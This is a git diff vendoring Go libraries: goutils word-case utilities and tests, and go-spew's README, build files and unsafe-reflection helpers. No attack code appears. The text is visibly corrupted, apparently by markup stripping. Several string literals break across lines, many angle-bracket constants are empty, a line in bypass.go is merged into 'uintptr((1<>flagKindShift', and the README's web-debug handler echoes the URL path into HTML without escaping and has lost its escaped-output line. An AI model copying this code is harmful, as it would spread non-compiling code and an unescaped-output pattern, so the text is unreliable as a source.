+ Other Lower case character converts to Upper case
+ Whitespace is defined by unicode.IsSpace(char).
+
+Parameters:
+ str - the string to swap case
+
+Returns:
+ the changed string
+*/
+func SwapCase(str string) string {
+ if str == "" {
+ return str
+ }
+ buffer := []rune(str)
+
+ whitespace := true
+
+ for i := 0; i < len(buffer); i++ {
+ ch := buffer[i]
+ if unicode.IsUpper(ch) {
+ buffer[i] = unicode.ToLower(ch)
+ whitespace = false
+ } else if unicode.IsTitle(ch) {
+ buffer[i] = unicode.ToLower(ch)
+ whitespace = false
+ } else if unicode.IsLower(ch) {
+ if whitespace {
+ buffer[i] = unicode.ToTitle(ch)
+ whitespace = false
+ } else {
+ buffer[i] = unicode.ToUpper(ch)
+ }
+ } else {
+ whitespace = unicode.IsSpace(ch)
+ }
+ }
+ return string(buffer)
+}
+
+/*
+Initials extracts the initial letters from each word in the string. The first letter of the string and all first
+letters after the defined delimiters are returned as a new string. Their case is not changed. If the delimiters
+parameter is excluded, then Whitespace is used. Whitespace is defined by unicode.IsSpacea(char). An empty delimiter array returns an empty string.
+
+Parameters:
+ str - the string to get initials from
+ delimiters - set of characters to determine words, exclusion of this parameter means whitespace would be delimeter
+Returns:
+ string of initial letters
+*/
+func Initials(str string, delimiters ...rune) string {
+ if str == "" {
+ return str
+ }
+ if delimiters != nil && len(delimiters) == 0 {
+ return ""
+ }
+ strLen := len(str)
+ var buf bytes.Buffer
+ lastWasGap := true
+ for i := 0; i < strLen; i++ {
+ ch := rune(str[i])
+
+ if isDelimiter(ch, delimiters...) {
+ lastWasGap = true
+ } else if lastWasGap {
+ buf.WriteRune(ch)
+ lastWasGap = false
+ }
+ }
+ return buf.String()
+}
+
+// private function (lower case func name)
+func isDelimiter(ch rune, delimiters ...rune) bool {
+ if delimiters == nil {
+ return unicode.IsSpace(ch)
+ }
+ for _, delimiter := range delimiters {
+ if ch == delimiter {
+ return true
+ }
+ }
+ return false
+}
diff --git a/vendor/github.com/aokoli/goutils/wordutils_test.go b/vendor/github.com/aokoli/goutils/wordutils_test.go
new file mode 100644
index 0000000000..377d9439c9
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/wordutils_test.go
@@ -0,0 +1,225 @@
+package goutils
+
+import (
+ "fmt"
+ "testing"
+)
+
+// ****************************** TESTS ********************************************
+
+func TestWrapNormalWord(t *testing.T) {
+
+ in := "Bob Manuel Bob Manuel"
+ out := "Bob Manuel\nBob Manuel"
+ wrapLength := 10
+
+ if x := Wrap(in, wrapLength); x != out {
+ t.Errorf("Wrap(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestWrapCustomLongWordFalse(t *testing.T) {
+
+ in := "BobManuelBob Bob"
+ out := "BobManuelBob
Bob"
+ wrapLength := 10
+ newLineStr := "
"
+ wrapLongWords := false
+
+ if x := WrapCustom(in, wrapLength, newLineStr, wrapLongWords); x != out {
+ t.Errorf("Wrap(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestWrapCustomLongWordTrue(t *testing.T) {
+
+ in := "BobManuelBob Bob"
+ out := "BobManuelB
ob Bob"
+ wrapLength := 10
+ newLineStr := "
"
+ wrapLongWords := true
+
+ if x := WrapCustom(in, wrapLength, newLineStr, wrapLongWords); x != out {
+ t.Errorf("WrapCustom(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestCapitalize(t *testing.T) {
+
+ // Test 1: Checks if function works with 1 parameter, and default whitespace delimiter
+ in := "test is going.well.thank.you.for inquiring"
+ out := "Test Is Going.well.thank.you.for Inquiring"
+
+ if x := Capitalize(in); x != out {
+ t.Errorf("Capitalize(%v) = %v, want %v", in, x, out)
+ }
+
+ // Test 2: Checks if function works with both parameters, with param 2 containing whitespace and '.'
+ out = "Test Is Going.Well.Thank.You.For Inquiring"
+ delimiters := []rune{' ', '.'}
+
+ if x := Capitalize(in, delimiters...); x != out {
+ t.Errorf("Capitalize(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestCapitalizeFully(t *testing.T) {
+
+ // Test 1
+ in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING"
+ out := "Test Is Going.well.thank.you.for Inquiring"
+
+ if x := CapitalizeFully(in); x != out {
+ t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out)
+ }
+
+ // Test 2
+ out = "Test Is Going.Well.Thank.You.For Inquiring"
+ delimiters := []rune{' ', '.'}
+
+ if x := CapitalizeFully(in, delimiters...); x != out {
+ t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestUncapitalize(t *testing.T) {
+
+ // Test 1: Checks if function works with 1 parameter, and default whitespace delimiter
+ in := "This Is A.Test"
+ out := "this is a.Test"
+
+ if x := Uncapitalize(in); x != out {
+ t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out)
+ }
+
+ // Test 2: Checks if function works with both parameters, with param 2 containing whitespace and '.'
+ out = "this is a.test"
+ delimiters := []rune{' ', '.'}
+
+ if x := Uncapitalize(in, delimiters...); x != out {
+ t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestSwapCase(t *testing.T) {
+
+ in := "This Is A.Test"
+ out := "tHIS iS a.tEST"
+
+ if x := SwapCase(in); x != out {
+ t.Errorf("SwapCase(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestInitials(t *testing.T) {
+
+ // Test 1
+ in := "John Doe.Ray"
+ out := "JD"
+
+ if x := Initials(in); x != out {
+ t.Errorf("Initials(%v) = %v, want %v", in, x, out)
+ }
+
+ // Test 2
+ out = "JDR"
+ delimiters := []rune{' ', '.'}
+
+ if x := Initials(in, delimiters...); x != out {
+ t.Errorf("Initials(%v) = %v, want %v", in, x, out)
+ }
+
+}
+
+// ****************************** EXAMPLES ********************************************
+
+func ExampleWrap() {
+
+ in := "Bob Manuel Bob Manuel"
+ wrapLength := 10
+
+ fmt.Println(Wrap(in, wrapLength))
+ // Output:
+ // Bob Manuel
+ // Bob Manuel
+}
+
+func ExampleWrapCustom_1() {
+
+ in := "BobManuelBob Bob"
+ wrapLength := 10
+ newLineStr := "
"
+ wrapLongWords := false
+
+ fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords))
+ // Output:
+ // BobManuelBob
Bob
+}
+
+func ExampleWrapCustom_2() {
+
+ in := "BobManuelBob Bob"
+ wrapLength := 10
+ newLineStr := "
"
+ wrapLongWords := true
+
+ fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords))
+ // Output:
+ // BobManuelB
ob Bob
+}
+
+func ExampleCapitalize() {
+
+ in := "test is going.well.thank.you.for inquiring" // Compare input to CapitalizeFully example
+ delimiters := []rune{' ', '.'}
+
+ fmt.Println(Capitalize(in))
+ fmt.Println(Capitalize(in, delimiters...))
+ // Output:
+ // Test Is Going.well.thank.you.for Inquiring
+ // Test Is Going.Well.Thank.You.For Inquiring
+}
+
+func ExampleCapitalizeFully() {
+
+ in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING" // Notice scattered capitalization
+ delimiters := []rune{' ', '.'}
+
+ fmt.Println(CapitalizeFully(in))
+ fmt.Println(CapitalizeFully(in, delimiters...))
+ // Output:
+ // Test Is Going.well.thank.you.for Inquiring
+ // Test Is Going.Well.Thank.You.For Inquiring
+}
+
+func ExampleUncapitalize() {
+
+ in := "This Is A.Test"
+ delimiters := []rune{' ', '.'}
+
+ fmt.Println(Uncapitalize(in))
+ fmt.Println(Uncapitalize(in, delimiters...))
+ // Output:
+ // this is a.Test
+ // this is a.test
+}
+
+func ExampleSwapCase() {
+
+ in := "This Is A.Test"
+ fmt.Println(SwapCase(in))
+ // Output:
+ // tHIS iS a.tEST
+}
+
+func ExampleInitials() {
+
+ in := "John Doe.Ray"
+ delimiters := []rune{' ', '.'}
+
+ fmt.Println(Initials(in))
+ fmt.Println(Initials(in, delimiters...))
+ // Output:
+ // JD
+ // JDR
+}
diff --git a/vendor/github.com/davecgh/go-spew/.gitignore b/vendor/github.com/davecgh/go-spew/.gitignore
new file mode 100644
index 0000000000..00268614f0
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/.gitignore
@@ -0,0 +1,22 @@
+# Compiled Object files, Static and Dynamic libs (Shared Objects)
+*.o
+*.a
+*.so
+
+# Folders
+_obj
+_test
+
+# Architecture specific extensions/prefixes
+*.[568vq]
+[568vq].out
+
+*.cgo1.go
+*.cgo2.c
+_cgo_defun.c
+_cgo_gotypes.go
+_cgo_export.*
+
+_testmain.go
+
+*.exe
diff --git a/vendor/github.com/davecgh/go-spew/.travis.yml b/vendor/github.com/davecgh/go-spew/.travis.yml
new file mode 100644
index 0000000000..984e0736e7
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/.travis.yml
@@ -0,0 +1,14 @@
+language: go
+go:
+ - 1.5.4
+ - 1.6.3
+ - 1.7
+install:
+ - go get -v golang.org/x/tools/cmd/cover
+script:
+ - go test -v -tags=safe ./spew
+ - go test -v -tags=testcgo ./spew -covermode=count -coverprofile=profile.cov
+after_success:
+ - go get -v github.com/mattn/goveralls
+ - export PATH=$PATH:$HOME/gopath/bin
+ - goveralls -coverprofile=profile.cov -service=travis-ci
diff --git a/vendor/github.com/davecgh/go-spew/LICENSE b/vendor/github.com/davecgh/go-spew/LICENSE
new file mode 100644
index 0000000000..c836416192
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/LICENSE
@@ -0,0 +1,15 @@
+ISC License
+
+Copyright (c) 2012-2016 Dave Collins
+
+Permission to use, copy, modify, and distribute this software for any
+purpose with or without fee is hereby granted, provided that the above
+copyright notice and this permission notice appear in all copies.
+
+THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
diff --git a/vendor/github.com/davecgh/go-spew/README.md b/vendor/github.com/davecgh/go-spew/README.md
new file mode 100644
index 0000000000..262430449b
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/README.md
@@ -0,0 +1,205 @@
+go-spew
+=======
+
+[![Build Status](https://img.shields.io/travis/davecgh/go-spew.svg)]
+(https://travis-ci.org/davecgh/go-spew) [![ISC License]
+(http://img.shields.io/badge/license-ISC-blue.svg)](http://copyfree.org) [![Coverage Status]
+(https://img.shields.io/coveralls/davecgh/go-spew.svg)]
+(https://coveralls.io/r/davecgh/go-spew?branch=master)
+
+
+Go-spew implements a deep pretty printer for Go data structures to aid in
+debugging. A comprehensive suite of tests with 100% test coverage is provided
+to ensure proper functionality. See `test_coverage.txt` for the gocov coverage
+report. Go-spew is licensed under the liberal ISC license, so it may be used in
+open source or commercial projects.
+
+If you're interested in reading about how this package came to life and some
+of the challenges involved in providing a deep pretty printer, there is a blog
+post about it
+[here](https://web.archive.org/web/20160304013555/https://blog.cyphertite.com/go-spew-a-journey-into-dumping-go-data-structures/).
+
+## Documentation
+
+[![GoDoc](https://img.shields.io/badge/godoc-reference-blue.svg)]
+(http://godoc.org/github.com/davecgh/go-spew/spew)
+
+Full `go doc` style documentation for the project can be viewed online without
+installing this package by using the excellent GoDoc site here:
+http://godoc.org/github.com/davecgh/go-spew/spew
+
+You can also view the documentation locally once the package is installed with
+the `godoc` tool by running `godoc -http=":6060"` and pointing your browser to
+http://localhost:6060/pkg/github.com/davecgh/go-spew/spew
+
+## Installation
+
+```bash
+$ go get -u github.com/davecgh/go-spew/spew
+```
+
+## Quick Start
+
+Add this import line to the file you're working in:
+
+```Go
+import "github.com/davecgh/go-spew/spew"
+```
+
+To dump a variable with full newlines, indentation, type, and pointer
+information use Dump, Fdump, or Sdump:
+
+```Go
+spew.Dump(myVar1, myVar2, ...)
+spew.Fdump(someWriter, myVar1, myVar2, ...)
+str := spew.Sdump(myVar1, myVar2, ...)
+```
+
+Alternatively, if you would prefer to use format strings with a compacted inline
+printing style, use the convenience wrappers Printf, Fprintf, etc with %v (most
+compact), %+v (adds pointer addresses), %#v (adds types), or %#+v (adds types
+and pointer addresses):
+
+```Go
+spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+```
+
+## Debugging a Web Application Example
+
+Here is an example of how you can use `spew.Sdump()` to help debug a web application. Please be sure to wrap your output using the `html.EscapeString()` function for safety reasons. You should also only use this debugging technique in a development environment, never in production.
+
+```Go
+package main
+
+import (
+ "fmt"
+ "html"
+ "net/http"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+func handler(w http.ResponseWriter, r *http.Request) {
+ w.Header().Set("Content-Type", "text/html")
+ fmt.Fprintf(w, "Hi there, %s!", r.URL.Path[1:])
+ fmt.Fprintf(w, "")
+}
+
+func main() {
+ http.HandleFunc("/", handler)
+ http.ListenAndServe(":8080", nil)
+}
+```
+
+## Sample Dump Output
+
+```
+(main.Foo) {
+ unexportedField: (*main.Bar)(0xf84002e210)({
+ flag: (main.Flag) flagTwo,
+ data: (uintptr)
+ }),
+ ExportedField: (map[interface {}]interface {}) {
+ (string) "one": (bool) true
+ }
+}
+([]uint8) {
+ 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... |
+ 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0|
+ 00000020 31 32 |12|
+}
+```
+
+## Sample Formatter Output
+
+Double pointer to a uint8:
+```
+ %v: <**>5
+ %+v: <**>(0xf8400420d0->0xf8400420c8)5
+ %#v: (**uint8)5
+ %#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5
+```
+
+Pointer to circular struct with a uint8 field and a pointer to itself:
+```
+ %v: <*>{1 <*>}
+ %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)}
+ %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)}
+ %#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)}
+```
+
+## Configuration Options
+
+Configuration of spew is handled by fields in the ConfigState type. For
+convenience, all of the top-level functions use a global state available via the
+spew.Config global.
+
+It is also possible to create a ConfigState instance that provides methods
+equivalent to the top-level functions. This allows concurrent configuration
+options. See the ConfigState documentation for more details.
+
+```
+* Indent
+ String to use for each indentation level for Dump functions.
+ It is a single space by default. A popular alternative is "\t".
+
+* MaxDepth
+ Maximum number of levels to descend into nested data structures.
+ There is no limit by default.
+
+* DisableMethods
+ Disables invocation of error and Stringer interface methods.
+ Method invocation is enabled by default.
+
+* DisablePointerMethods
+ Disables invocation of error and Stringer interface methods on types
+ which only accept pointer receivers from non-pointer variables. This option
+ relies on access to the unsafe package, so it will not have any effect when
+ running in environments without access to the unsafe package such as Google
+ App Engine or with the "safe" build tag specified.
+ Pointer method invocation is enabled by default.
+
+* DisablePointerAddresses
+ DisablePointerAddresses specifies whether to disable the printing of
+ pointer addresses. This is useful when diffing data structures in tests.
+
+* DisableCapacities
+ DisableCapacities specifies whether to disable the printing of capacities
+ for arrays, slices, maps and channels. This is useful when diffing data
+ structures in tests.
+
+* ContinueOnMethod
+ Enables recursion into types after invoking error and Stringer interface
+ methods. Recursion after method invocation is disabled by default.
+
+* SortKeys
+ Specifies map keys should be sorted before being printed. Use
+ this to have a more deterministic, diffable output. Note that
+ only native types (bool, int, uint, floats, uintptr and string)
+ and types which implement error or Stringer interfaces are supported,
+ with other types sorted according to the reflect.Value.String() output
+ which guarantees display stability. Natural map order is used by
+ default.
+
+* SpewKeys
+ SpewKeys specifies that, as a last resort attempt, map keys should be
+ spewed to strings and sorted by those strings. This is only considered
+ if SortKeys is true.
+
+```
+
+## Unsafe Package Dependency
+
+This package relies on the unsafe package to perform some of the more advanced
+features, however it also supports a "limited" mode which allows it to work in
+environments where the unsafe package is not available. By default, it will
+operate in this mode on Google App Engine and when compiled with GopherJS. The
+"safe" build tag may also be specified to force the package to build without
+using the unsafe package.
+
+## License
+
+Go-spew is licensed under the [copyfree](http://copyfree.org) ISC License.
diff --git a/vendor/github.com/davecgh/go-spew/cov_report.sh b/vendor/github.com/davecgh/go-spew/cov_report.sh
new file mode 100644
index 0000000000..9579497e41
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/cov_report.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# This script uses gocov to generate a test coverage report.
+# The gocov tool my be obtained with the following command:
+# go get github.com/axw/gocov/gocov
+#
+# It will be installed to $GOPATH/bin, so ensure that location is in your $PATH.
+
+# Check for gocov.
+if ! type gocov >/dev/null 2>&1; then
+ echo >&2 "This script requires the gocov tool."
+ echo >&2 "You may obtain it with the following command:"
+ echo >&2 "go get github.com/axw/gocov/gocov"
+ exit 1
+fi
+
+# Only run the cgo tests if gcc is installed.
+if type gcc >/dev/null 2>&1; then
+ (cd spew && gocov test -tags testcgo | gocov report)
+else
+ (cd spew && gocov test | gocov report)
+fi
diff --git a/vendor/github.com/davecgh/go-spew/spew/bypass.go b/vendor/github.com/davecgh/go-spew/spew/bypass.go
new file mode 100644
index 0000000000..8a4a6589a2
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/bypass.go
@@ -0,0 +1,152 @@
+// Copyright (c) 2015-2016 Dave Collins
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when the code is not running on Google App Engine, compiled by GopherJS, and
+// "-tags safe" is not added to the go build command line. The "disableunsafe"
+// tag is deprecated and thus should not be used.
+// +build !js,!appengine,!safe,!disableunsafe
+
+package spew
+
+import (
+ "reflect"
+ "unsafe"
+)
+
+const (
+ // UnsafeDisabled is a build-time constant which specifies whether or
+ // not access to the unsafe package is available.
+ UnsafeDisabled = false
+
+ // ptrSize is the size of a pointer on the current arch.
+ ptrSize = unsafe.Sizeof((*byte)(nil))
+)
+
+var (
+ // offsetPtr, offsetScalar, and offsetFlag are the offsets for the
+ // internal reflect.Value fields. These values are valid before golang
+ // commit ecccf07e7f9d which changed the format. The are also valid
+ // after commit 82f48826c6c7 which changed the format again to mirror
+ // the original format. Code in the init function updates these offsets
+ // as necessary.
+ offsetPtr = uintptr(ptrSize)
+ offsetScalar = uintptr(0)
+ offsetFlag = uintptr(ptrSize * 2)
+
+ // flagKindWidth and flagKindShift indicate various bits that the
+ // reflect package uses internally to track kind information.
+ //
+ // flagRO indicates whether or not the value field of a reflect.Value is
+ // read-only.
+ //
+ // flagIndir indicates whether the value field of a reflect.Value is
+ // the actual data or a pointer to the data.
+ //
+ // These values are valid before golang commit 90a7c3c86944 which
+ // changed their positions. Code in the init function updates these
+ // flags as necessary.
+ flagKindWidth = uintptr(5)
+ flagKindShift = uintptr(flagKindWidth - 1)
+ flagRO = uintptr(1 << 0)
+ flagIndir = uintptr(1 << 1)
+)
+
+func init() {
+ // Older versions of reflect.Value stored small integers directly in the
+ // ptr field (which is named val in the older versions). Versions
+ // between commits ecccf07e7f9d and 82f48826c6c7 added a new field named
+ // scalar for this purpose which unfortunately came before the flag
+ // field, so the offset of the flag field is different for those
+ // versions.
+ //
+ // This code constructs a new reflect.Value from a known small integer
+ // and checks if the size of the reflect.Value struct indicates it has
+ // the scalar field. When it does, the offsets are updated accordingly.
+ vv := reflect.ValueOf(0xf00)
+ if unsafe.Sizeof(vv) == (ptrSize * 4) {
+ offsetScalar = ptrSize * 2
+ offsetFlag = ptrSize * 3
+ }
+
+ // Commit 90a7c3c86944 changed the flag positions such that the low
+ // order bits are the kind. This code extracts the kind from the flags
+ // field and ensures it's the correct type. When it's not, the flag
+ // order has been changed to the newer format, so the flags are updated
+ // accordingly.
+ upf := unsafe.Pointer(uintptr(unsafe.Pointer(&vv)) + offsetFlag)
+ upfv := *(*uintptr)(upf)
+ flagKindMask := uintptr((1<>flagKindShift != uintptr(reflect.Int) {
+ flagKindShift = 0
+ flagRO = 1 << 5
+ flagIndir = 1 << 6
+
+ // Commit adf9b30e5594 modified the flags to separate the
+ // flagRO flag into two bits which specifies whether or not the
+ // field is embedded. This causes flagIndir to move over a bit
+ // and means that flagRO is the combination of either of the
+ // original flagRO bit and the new bit.
+ //
+ // This code detects the change by extracting what used to be
+ // the indirect bit to ensure it's set. When it's not, the flag
+ // order has been changed to the newer format, so the flags are
+ // updated accordingly.
+ if upfv&flagIndir == 0 {
+ flagRO = 3 << 5
+ flagIndir = 1 << 7
+ }
+ }
+}
+
+// unsafeReflectValue converts the passed reflect.Value into a one that bypasses
+// the typical safety restrictions preventing access to unaddressable and
+// unexported data. It works by digging the raw pointer to the underlying
+// value out of the protected value and generating a new unprotected (unsafe)
+// reflect.Value to it.
+//
+// This allows us to check for implementations of the Stringer and error
+// interfaces to be used for pretty printing ordinarily unaddressable and
+// inaccessible values such as unexported struct fields.
+func unsafeReflectValue(v reflect.Value) (rv reflect.Value) {
+ indirects := 1
+ vt := v.Type()
+ upv := unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetPtr)
+ rvf := *(*uintptr)(unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetFlag))
+ if rvf&flagIndir != 0 {
+ vt = reflect.PtrTo(v.Type())
+ indirects++
+ } else if offsetScalar != 0 {
+ // The value is in the scalar field when it's not one of the
+ // reference types.
+ switch vt.Kind() {
+ case reflect.Uintptr:
+ case reflect.Chan:
+ case reflect.Func:
+ case reflect.Map:
+ case reflect.Ptr:
+ case reflect.UnsafePointer:
+ default:
+ upv = unsafe.Pointer(uintptr(unsafe.Pointer(&v)) +
+ offsetScalar)
+ }
+ }
+
+ pv := reflect.NewAt(vt, upv)
+ rv = pv
+ for i := 0; i < indirects; i++ {
+ rv = rv.Elem()
+ }
+ return rv
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go
new file mode 100644
index 0000000000..1fe3cf3d5d
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go
@@ -0,0 +1,38 @@
+// Copyright (c) 2015-2016 Dave Collins
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when the code is running on Google App Engine, compiled by GopherJS, or
+// "-tags safe" is added to the go build command line. The "disableunsafe"
+// tag is deprecated and thus should not be used.
+// +build js appengine safe disableunsafe
+
+package spew
+
+import "reflect"
+
+const (
+ // UnsafeDisabled is a build-time constant which specifies whether or
+ // not access to the unsafe package is available.
+ UnsafeDisabled = true
+)
+
+// unsafeReflectValue typically converts the passed reflect.Value into a one
+// that bypasses the typical safety restrictions preventing access to
+// unaddressable and unexported data. However, doing this relies on access to
+// the unsafe package. This is a stub version which simply returns the passed
+// reflect.Value when the unsafe package is not available.
+func unsafeReflectValue(v reflect.Value) reflect.Value {
+ return v
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/common.go b/vendor/github.com/davecgh/go-spew/spew/common.go
new file mode 100644
index 0000000000..7c519ff47a
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/common.go
@@ -0,0 +1,341 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+ "bytes"
+ "fmt"
+ "io"
+ "reflect"
+ "sort"
+ "strconv"
+)
+
+// Some constants in the form of bytes to avoid string overhead. This mirrors
+// the technique used in the fmt package.
+var (
+ panicBytes = []byte("(PANIC=")
+ plusBytes = []byte("+")
+ iBytes = []byte("i")
+ trueBytes = []byte("true")
+ falseBytes = []byte("false")
+ interfaceBytes = []byte("(interface {})")
+ commaNewlineBytes = []byte(",\n")
+ newlineBytes = []byte("\n")
+ openBraceBytes = []byte("{")
+ openBraceNewlineBytes = []byte("{\n")
+ closeBraceBytes = []byte("}")
+ asteriskBytes = []byte("*")
+ colonBytes = []byte(":")
+ colonSpaceBytes = []byte(": ")
+ openParenBytes = []byte("(")
+ closeParenBytes = []byte(")")
+ spaceBytes = []byte(" ")
+ pointerChainBytes = []byte("->")
+ nilAngleBytes = []byte("")
+ maxNewlineBytes = []byte("\n")
+ maxShortBytes = []byte("")
+ circularBytes = []byte("")
+ circularShortBytes = []byte("")
+ invalidAngleBytes = []byte("")
+ openBracketBytes = []byte("[")
+ closeBracketBytes = []byte("]")
+ percentBytes = []byte("%")
+ precisionBytes = []byte(".")
+ openAngleBytes = []byte("<")
+ closeAngleBytes = []byte(">")
+ openMapBytes = []byte("map[")
+ closeMapBytes = []byte("]")
+ lenEqualsBytes = []byte("len=")
+ capEqualsBytes = []byte("cap=")
+)
+
+// hexDigits is used to map a decimal value to a hex digit.
+var hexDigits = "0123456789abcdef"
+
+// catchPanic handles any panics that might occur during the handleMethods
+// calls.
+func catchPanic(w io.Writer, v reflect.Value) {
+ if err := recover(); err != nil {
+ w.Write(panicBytes)
+ fmt.Fprintf(w, "%v", err)
+ w.Write(closeParenBytes)
+ }
+}
+
+// handleMethods attempts to call the Error and String methods on the underlying
+// type the passed reflect.Value represents and outputes the result to Writer w.
+//
+// It handles panics in any called methods by catching and displaying the error
+// as the formatted value.
+func handleMethods(cs *ConfigState, w io.Writer, v reflect.Value) (handled bool) {
+ // We need an interface to check if the type implements the error or
+ // Stringer interface. However, the reflect package won't give us an
+ // interface on certain things like unexported struct fields in order
+ // to enforce visibility rules. We use unsafe, when it's available,
+ // to bypass these restrictions since this package does not mutate the
+ // values.
+ if !v.CanInterface() {
+ if UnsafeDisabled {
+ return false
+ }
+
+ v = unsafeReflectValue(v)
+ }
+
+ // Choose whether or not to do error and Stringer interface lookups against
+ // the base type or a pointer to the base type depending on settings.
+ // Technically calling one of these methods with a pointer receiver can
+ // mutate the value, however, types which choose to satisify an error or
+ // Stringer interface with a pointer receiver should not be mutating their
+ // state inside these interface methods.
+ if !cs.DisablePointerMethods && !UnsafeDisabled && !v.CanAddr() {
+ v = unsafeReflectValue(v)
+ }
+ if v.CanAddr() {
+ v = v.Addr()
+ }
+
+ // Is it an error or Stringer?
+ switch iface := v.Interface().(type) {
+ case error:
+ defer catchPanic(w, v)
+ if cs.ContinueOnMethod {
+ w.Write(openParenBytes)
+ w.Write([]byte(iface.Error()))
+ w.Write(closeParenBytes)
+ w.Write(spaceBytes)
+ return false
+ }
+
+ w.Write([]byte(iface.Error()))
+ return true
+
+ case fmt.Stringer:
+ defer catchPanic(w, v)
+ if cs.ContinueOnMethod {
+ w.Write(openParenBytes)
+ w.Write([]byte(iface.String()))
+ w.Write(closeParenBytes)
+ w.Write(spaceBytes)
+ return false
+ }
+ w.Write([]byte(iface.String()))
+ return true
+ }
+ return false
+}
+
+// printBool outputs a boolean value as true or false to Writer w.
+func printBool(w io.Writer, val bool) {
+ if val {
